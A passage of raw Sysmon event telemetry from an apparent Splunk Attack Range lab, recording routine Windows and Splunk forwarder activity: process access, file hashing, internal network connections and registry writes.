C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215655Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215654Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215653Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215652Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215651Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215650Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1023-6216-3304-000000003902}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.510{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1023-6216-3304-000000003902}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.512{4F8D34B0-1023-6216-3304-000000003902}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000215662Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:52.807{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D14C7AA49BC6A6B765C5404E588DDDE8,SHA256=7BB5EFCA5712963AAE18607A4F51CB971CE4F5196A14F993D2D6EAAB539C8F49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:52.648{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8FFF6792EE7DD526499BAC83596E49C,SHA256=33850E0D2A0A7F2A98CD6F43112CAB59361D6CC0E4CE568EFAC0BE505E2B4A7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215661Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:52.557{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D8F60361118F3DBBE6D6F27142A485E,SHA256=2D369957A4D28FA255CBE35D4944BEB0DC0C7A4DB1EEBAF7953F625CDDBB3F4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215663Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:53.995{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63BDFA4D3B33DA8C00213CB87541F182,SHA256=2D291FA2B4B16E02CC78621512162B1BB118661CE5DEE735650972D194D1120B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:53.679{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34F8F40449CFBBDA43C65BA92232CE80,SHA256=508FEF87E575B971164FF42DE81A9CB519345C26FF8C8C0593A4F7376344CA17,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:53.273{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:53.273{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:53.273{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:54.695{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46636773245A72A2AE54D9833CFE2BE8,SHA256=20F9828BA88E51FEF2AE2A03857A28090B4E90A839D619723290D926851E11CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215664Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:51.590{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51270-false10.0.1.12-8000- 13241300x8000000000000000286730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:55.882{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{182C3813-DF97-40FA-9C4E-B7D3E74F00CA} {00021500-0000-0000-C000-000000000046} 0xFFFFBinary Data 23542300x8000000000000000286729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:55.710{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=442EC32E8E2483C55094448518B667CC,SHA256=58C3DC651074654DD31891E0F4FB3874D724E2D6CBEE9361A7795157E4B841B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215665Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:55.135{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26756A2587002A79D284CAF8817CE801,SHA256=914CC6B0AFD671EB753C0277CC1D6306D96DEC64E120118AB77786696FA3B30F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:54.543{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53354-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:56.710{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6DA8CA08BAC9FE9FCA00A53FA4ADD72,SHA256=5777F751E82AF5C23A491A9BBEFAFEE433391AFE9D0BAFF9ACF783A2F748C3C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215666Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:56.276{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B48000F0B7DE8ACB94170F230BDD2BE,SHA256=36713ABD05EE54F796782B7BCC8B1A8433D4ACE492812213ED6F122DF97869A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:57.804{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9B4EEF1CC0BFC885D4B0D8239A62C57,SHA256=DAD55D54D679D23E82640144745C13AB98B2165E86CB023CA2F74194D1BA5860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215667Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:57.292{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E36C2B2E9A87B688083F8A0EFE7B14F,SHA256=DA3A67397D80038E1520C89F8EE680E0257C44118943F9C0F427834C072DB5C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215668Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:58.526{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94C8BB7FFF8BFA5D9CB86D0DCC0E0DD3,SHA256=51E744904465DADAC24B3087BE8F5AB95519917594CB84BB16736DCBCC9ED123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:58.820{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBF51F3F077A218BFD8F6C29044EF0D5,SHA256=FE7CF16209355018F5817606D628895DD0F3A2A7912EC9091E00798FF06F69C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:44:59.820{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5D8465E43292DDE6AEFB460E4710E33,SHA256=C84E4E7A222547E80AD84A017C6E7600D3E7D58FA292A1B5AAF28D13CEBA5DEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:59.745{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52ABB14E42CA5436EE767D3F223192B1,SHA256=99EE5001EEF7F64C95F4DC951A9BC6E9F18B8CF075ADFB1F7CD1D412BB44FE60,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000286735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:44:59.788{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d828a2-0x67c0313d) 23542300x8000000000000000286737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:00.835{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A98BAF809E3546B26AE9ACC71D8DD19,SHA256=F20471CC4E718B5C7C74F45166073E4E17A8F17DC3C09D54D4A1023C4A65542A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:00.760{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90590E73D6D994AEA026EEBF7F2FAC11,SHA256=A5B5981556E198263B846F52FF79AE907FB8E2ED5EA9A2EB2983EA6951007380,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:44:57.606{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51271-false10.0.1.12-8000- 23542300x8000000000000000215672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:45:01.776{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4B4D2ADC48186F2D85B915812A51ABA,SHA256=F718ABF98F6BE542F36D6DD6565132D362ECD5DAD4F899DE8336D62448229DCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.976{C8EA50B7-102D-6216-E204-000000003802}54324232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.882{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D37B3C685503C9E63B06CCD259C2DC06,SHA256=D75867F278A000152B6F6E55F43EE4BA867DE81866CCF2D14DA71060415E2C07,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:45:01.757{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-102D-6216-E204-000000003802}5432C:\Program 